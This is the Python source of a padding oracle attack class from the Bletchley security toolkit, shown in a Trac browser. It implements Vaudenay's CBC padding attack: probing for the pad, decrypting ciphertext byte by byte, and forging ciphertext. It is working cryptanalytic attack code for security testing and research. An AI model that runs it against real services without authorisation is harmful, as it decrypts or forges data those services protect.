source: trunk/lib/bletchley/CBC/__init__.py @ 69

Last change on this file since 69 was 69, checked in by tim, 10 years ago

.

File size: 15.7 KB
Line 
1'''
2Created on Jul 4, 2010
3
4Copyright (C) 2010 ELOI SANFÈLIX
5Copyright (C) 2012-2013 Timothy D. Morgan
6@author: Eloi Sanfelix < eloi AT limited-entropy.com >
7@author: Timothy D. Morgan < tmorgan {a} vsecurity . com >
8
9 This program is free software: you can redistribute it and/or modify
10 it under the terms of the GNU Lesser General Public License, version 3,
11 as published by the Free Software Foundation.
12
13 This program is distributed in the hope that it will be useful,
14 but WITHOUT ANY WARRANTY; without even the implied warranty of
15 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
16 GNU General Public License for more details.
17
18 You should have received a copy of the GNU General Public License
19 along with this program.  If not, see <http://www.gnu.org/licenses/>.
20'''
21
22import random
23import struct
24import threading
25from .. import buffertools
26from .Exceptions import *
27
class POA:
    """This class implements padding oracle attacks given a ciphertext and
    function that acts as a padding oracle.

    The padding scheme is assumed to be PKCS#5/#7, also defined in RFC2040.
    This attack was first described in:
     "Security Flaws Induced by CBC Padding. Applications to SSL, IPSEC,
      WTLS" by Serge Vaudenay (2002)

    POA objects are not caller thread-safe.  If multiple threads need to work
    simultaneously on the same ciphertext and oracle, create a
    separate instance. POA objects can execute tasks internally using
    multiple threads, however.

    Every oracle query issued by this class has the form
      oracle(original_ciphertext + forged_prior_block + target_block, iv)
    so the oracle's verdict is expected to depend on the padding of the
    final block of the message it receives.

    """

    ## private
    # Byte value found by a worker thread during the current search, or
    # None while no candidate has been accepted by the oracle.
    _thread_result = None
    _oracle = None
    _ciphertext = None
    _iv = None

    ## protected (reading ok, changing not ok)
    block_size = None

    ## public (r/w ok)
    # Number of additional attempts made when a byte cannot be determined.
    retries = 2
    # Known tail of the plaintext (including the pad); grows toward the
    # front of the message as bytes are recovered.
    decrypted = None
    threads = None
    log_fh = None

    def __init__(self, oracle, block_size, ciphertext, iv=None,
                 threads=1, decrypted=b'', log_file=None):
        """Creates a new padding oracle attack (POA) object.

        Arguments:
        oracle -- A function which returns True if the given ciphertext
         results in a correct padding upon decryption and False
         otherwise.  This function should implement the prototype:
           def myOracle(ciphertext, iv): ...
         If the initialization vector (iv) is unknown or not included in
         the ciphertext message, it can be ignored in your oracle
         implementation (though some limitations will result from this).

        block_size -- The block size of the ciphertext being attacked.
         Is almost always 8 or 16.

        ciphertext -- The ciphertext to be decrypted

        iv -- The initialization vector associated with the ciphertext.
         If none provided, it is assumed to be a block of 0's

        threads -- The maximum number of parallel threads to use during
         decryption.  If more than one thread is used, then the oracle
         function will be called in parallel.  It should implement any
         internal locking necessary to prevent race conditions where
         applicable.

        decrypted -- If a portion of the plaintext is already known (due
         to a prior, partially successful decryption attempt), then this
         may be used to restart the decryption process where it was
         previously left off.  This argument is assumed to contain the
         final N bytes (for an N-byte argument) of the plaintext; that
         is, the tail of the plaintext including the pad.

        log_file -- A Python file object where log messages will be
         written.

        Raises InvalidBlockError if the ciphertext or IV length is not a
        multiple of block_size (or the ciphertext is shorter than one
        block), and Exception if decrypted is longer than ciphertext.

        """

        if len(ciphertext) % block_size != 0 or len(ciphertext) < block_size:
            raise InvalidBlockError(block_size, len(ciphertext))
        if iv is not None and len(iv) % block_size != 0:
            raise InvalidBlockError(block_size, len(iv))
        if len(decrypted) > len(ciphertext):
            # XXX: custom exception
            raise Exception("decrypted (%d bytes) is longer than ciphertext (%d bytes)"
                            % (len(decrypted), len(ciphertext)))

        self.block_size = block_size
        self.decrypted = decrypted
        self.threads = threads
        self.log_fh = log_file

        self._oracle = oracle
        self._ciphertext = ciphertext
        if iv is None:
            self._iv = b'\x00' * self.block_size
        else:
            self._iv = iv


    def log_message(self, s):
        """Writes s plus a newline to the log file, if one was supplied."""
        if self.log_fh is not None:
            self.log_fh.write(s + '\n')


    def probe_padding(self):
        """Attempts to verify that a CBC padding oracle exists and then determines the
        pad value.

        Returns the pad string, or None on failure.
        XXX: Currently only works for PKCS 5/7.
        """

        blocks = buffertools.splitBuffer(self._ciphertext, self.block_size)
        final = blocks[-1]
        # If only one block is present, then try to use the IV as prior
        prior = self._iv if len(blocks) == 1 else blocks[-2]

        ret_val = None
        # First probe for beginning of pad: corrupt one byte of the prior
        # block at a time, front to back.  The first corruption the
        # oracle rejects marks the start of the pad.  The last byte is
        # never probed; reaching it means a 1-byte pad is suspected.
        for i in range(-self.block_size, 0):
            if i == -1:
                break
            tweaked = bytes([prior[i] ^ 0xFF])
            if not self._oracle(self._ciphertext + prior[:i] + tweaked + prior[i+1:] + final,
                                self._iv):
                break

        pad_length = -i
        self.log_message("Testing suspected pad length: %d" % pad_length)
        if pad_length > 1:
            # XXX: If this test case fails, we should try instead
            # lengthing the pad by one byte with all 256 values (as is
            # done in the 1-byte pad case).
            #
            # Verify suspected pad length by changing last pad byte to 1
            # and making sure the padding succeeds
            tweaked = bytes([prior[-1] ^ (pad_length ^ 1)])

            #XXX: This replaces the pad bytes with spaces.  The hope is
            #     that any UTF-8 decoding errors that the pad bytes
            #     might generate are addressed this way.  It is not yet
            #     well tested.  An option should be added to allow other
            #     bytes to be used or to turn off the behavior.
            #
            # Only the pad bytes (all but the last, which becomes 1) are
            # rewritten; bytes ahead of the pad carry real plaintext and
            # are left untouched.
            prior = bytearray(prior)
            for q in range(-pad_length, -1):
                prior[q] ^= pad_length ^ 32  # space

            if self._oracle(self._ciphertext + prior[:-1] + tweaked + final, self._iv):
                ret_val = buffertools.pkcs7Pad(pad_length)

        else:
            # Verify by changing pad byte to 2 and brute-force changing
            # second-to-last byte to 2 as well.  j == 0 is included so a
            # plaintext whose second-to-last byte already equals 2 is
            # still confirmed.
            tweaked = bytes([prior[-1] ^ (2 ^ 1)])
            for j in range(256):
                guess = bytes([prior[-2] ^ j])
                if self._oracle(self._ciphertext + prior[:-2] + guess + tweaked + final,
                                self._iv):
                    # XXX: Save the decrypted byte for later
                    ret_val = buffertools.pkcs7Pad(pad_length)
                    # One hit is enough; don't spend more oracle queries
                    break

        return ret_val


    # XXX: This could be generalized as a byte probe utility for a variety of attacks
    def _test_value_set(self, prefix, suffix, value_set):
        """Worker routine: tries each byte value in value_set between
        prefix and suffix and records the first one the oracle accepts in
        self._thread_result.  Stops early once any worker has recorded a
        result.
        """
        for b in value_set:
            if self._thread_result is not None:
                # Stop if another thread found the result
                break
            if self._oracle(prefix + bytes([b]) + suffix, self._iv):
                self._thread_result = b
                break


    def decrypt_next_byte(self, prior, block, known_bytes, cache=True):
        """Decrypts one byte of ciphertext by modifying the prior
        ciphertext block at the same relative offset.

        Arguments:
        prior -- Ciphertext block appearing prior to the current target
        block -- Currently targeted ciphertext block
        known_bytes -- Bytes in this block already decrypted
        cache -- If True, the recovered byte is also prepended to
         self.decrypted

        Returns the newly decrypted byte followed by known_bytes.  If
        known_bytes already fills a whole block it is returned unchanged.

        Raises InvalidBlockError if block is not block_size bytes long,
        and Exception if no byte value satisfies the oracle after all
        retries.

        """

        if len(block) != self.block_size:
            raise InvalidBlockError(self.block_size, len(block))
        num_known = len(known_bytes)

        if num_known >= self.block_size:
            return known_bytes

        # The pad value we forge covers the known bytes plus the target
        pad_value = num_known + 1
        target = self.block_size - pad_value
        prior_prefix = prior[:target]
        base = prior[target]
        # Adjust known bytes to appear as a PKCS 7 pad
        prior_tail = prior[len(prior) - num_known:]
        suffix = bytes(p ^ k ^ pad_value for p, k in zip(prior_tail, known_bytes)) + block

        # XXX: catch any signal exceptions, such as ^C, and communicate
        #      this back to the rest of the script so it can end immediately
        for attempt in range(1 + self.retries):
            # Each thread spawned searches a subset of the next byte's
            # 256 possible values
            self._thread_result = None
            workers = []
            for offset in range(self.threads):
                t = threading.Thread(target=self._test_value_set,
                                     args=(self._ciphertext + prior_prefix, suffix,
                                           range(offset, 256, self.threads)))
                t.start()
                workers.append(t)

            for t in workers:
                t.join()

            if self._thread_result is not None:
                break

            # If a byte fails to decrypt, it could be because the prior
            # block's decrypted value violates UTF-8 decoding rules, or
            # because it randomly introduced a delimiter that causes
            # problems.  If retries are enabled, we insert an additional
            # random block before the prior block so that the decrypted
            # value can be changed.
            if attempt < self.retries:
                self.log_message("Value of a byte could not be determined. Retrying...")
                # XXX: Instead of adding a new random block to the
                #      beginning every time, would be better to just keep
                #      randomizing the same block before the original
                #      prior_prefix.
                prior_prefix = bytes(random.getrandbits(8)
                                     for _ in range(self.block_size)) + prior_prefix

        if self._thread_result is None:
            self.log_message("Value of a byte could not be determined.  Current plaintext suffix: "+ repr(self.decrypted))
            # XXX: custom exception
            raise Exception("Value of a byte could not be determined")

        decrypted = bytes([self._thread_result ^ base ^ pad_value])
        if cache:
            self.decrypted = decrypted + self.decrypted
        #  Return previous bytes together with current byte
        return decrypted + known_bytes


    def decrypt_block(self, prior, block, last_bytes=b'', cache=True):
        """Decrypts the block of ciphertext provided as a parameter.

        Arguments:
        prior -- Ciphertext block (or IV) preceding the target block
        block -- Ciphertext block to decrypt
        last_bytes -- Trailing plaintext bytes of this block that are
         already known
        cache -- Passed through to decrypt_next_byte

        Returns the block's plaintext.

        """

        while len(last_bytes) != self.block_size:
            last_bytes = self.decrypt_next_byte(prior, block, last_bytes, cache)

        self.log_message("Decrypted block: %s" % repr(last_bytes))
        return last_bytes


    def decrypt(self):
        """Decrypts the previously supplied ciphertext. If the IV was
        not provided, it assumes a IV of zero bytes.

        Returns the plaintext with the padding stripped.  Raises
        Exception if the pad length cannot be determined.

        """

        if not self.decrypted:
            # First decrypt the padding (quick to decrypt and good sanity check)
            pad_bytes = self.probe_padding()
            if pad_bytes is None:
                # XXX: custom exception
                self.log_message("Could not determine pad length")
                raise Exception("Could not determine pad length")

            self.decrypted = pad_bytes

        # Start where we left off last, whether that be with just a pad,
        # or with additional decrypted blocks.

        # number of bytes in any partially decrypted blocks
        num_partial = len(self.decrypted) % self.block_size

        # number of blocks fully decrypted
        finished_blocks = len(self.decrypted) // self.block_size

        # contents of the partial block
        partial = self.decrypted[:num_partial]

        # contents of fully decrypted blocks
        decrypted = self.decrypted[num_partial:]

        blocks = buffertools.splitBuffer(self._ciphertext, self.block_size)

        # Start with the partially decrypted block at the end, and work
        # our way to the front.  Don't decrypt the very first block of
        # the ciphertext yet.
        for i in range(len(blocks) - 1 - finished_blocks, 0, -1):
            decrypted = self.decrypt_block(blocks[i-1], blocks[i], partial) + decrypted
            partial = b''

        # Finally decrypt first block
        if finished_blocks < len(blocks):
            decrypted = self.decrypt_block(self._iv, blocks[0], partial) + decrypted

        # Remove the padding and return
        return buffertools.stripPKCS7Pad(decrypted, self.block_size, self.log_fh)


    def encrypt_block(self, plaintext, ciphertext):
        """Encrypts a block of plaintext.  This is accomplished by
        decrypting the supplied ciphertext and then computing the prior
        block needed to create the desired plaintext at the ciphertext's
        location.

        Returns the calculated prior block and the provided ciphertext
        block as a tuple.

        Raises InvalidBlockError if either argument is not exactly one
        block long.

        """
        if len(plaintext) != self.block_size or len(plaintext) != len(ciphertext):
            raise InvalidBlockError(self.block_size, len(plaintext))

        # With an all-zero prior block the "plaintext" recovered is the
        # raw block-cipher output for this ciphertext block.
        ptext = self.decrypt_block(b'\x00' * self.block_size, ciphertext, cache=False)
        prior = buffertools.xorBuffers(ptext, plaintext)
        self.log_message("Encrypted block: %s to %s with prior %s" % (repr(plaintext), repr(ciphertext), repr(prior)))
        return prior, ciphertext


    def encrypt(self, plaintext, ciphertext=None):
        """Encrypts a plaintext value through "CBC-R" style prior-block
        propagation.

        Arguments:
        plaintext -- The (unpadded) plaintext to encrypt
        ciphertext -- Optional result of an earlier, interrupted call:
         the prior block followed by the ciphertext blocks generated so
         far (the "prior+ciphertext" value logged on failure).  Work
         resumes from there instead of starting over.

        Returns a tuple of the IV and ciphertext.  If a block cannot be
        encrypted, the failure is logged and the partial result produced
        so far is returned.

        NOTE: If your target messages do not include an IV with the
        ciphertext, you can instead opt to encrypt a suffix of the
        message and include the IV in the middle of the ciphertext as
        if it were an encrypted block. This one block alone will decrypt
        to an uncontrollable random value, but with careful placement,
        this might be ok.

        """

        blocks = buffertools.splitBuffer(buffertools.pkcs7PadBuffer(plaintext, self.block_size),
                                         self.block_size)
        if ciphertext is not None:
            if (len(ciphertext) % self.block_size != 0
                    or len(ciphertext) < self.block_size):
                raise InvalidBlockError(self.block_size, len(ciphertext))
            num_cblocks = (len(ciphertext) // self.block_size) - 1
            # We've already encrypted these.  Index from the front: a
            # negative-offset slice would wipe the whole list when
            # num_cblocks is 0.
            del blocks[max(0, len(blocks) - num_cblocks):]
            # The first block is the prior; the rest is finished
            # ciphertext.  Split them so the prior is not emitted twice.
            prior = ciphertext[:self.block_size]
            ciphertext = ciphertext[self.block_size:]

        elif (len(self.decrypted) >= self.block_size
              and len(self._ciphertext) >= 2 * self.block_size):
            # If possible, reuse work from prior decryption efforts on original
            # message for last block
            old_prior = self._ciphertext[-2 * self.block_size:-self.block_size]
            final_plaintext = self.decrypted[-self.block_size:]
            prior = buffertools.xorBuffers(old_prior,
                                           buffertools.xorBuffers(final_plaintext, blocks[-1]))
            ciphertext = self._ciphertext[-self.block_size:]
            del blocks[-1]
        else:
            # Otherwise, select a random last block and generate the prior block
            prior = bytes(random.getrandbits(8) for _ in range(self.block_size))
            ciphertext = b''

        try:
            # Continue generating all prior blocks, last to first
            for pblock in reversed(blocks):
                prior, cblock = self.encrypt_block(pblock, prior)
                ciphertext = cblock + ciphertext
        except Exception:
            # Deliberately best-effort: log the state reached so the
            # caller can resume by passing it back as `ciphertext`.
            self.log_message("Encryption failure. prior+ciphertext: %s" % repr(prior+ciphertext))

        # prior as IV
        return prior, ciphertext
Note: See TracBrowser for help on using the repository browser.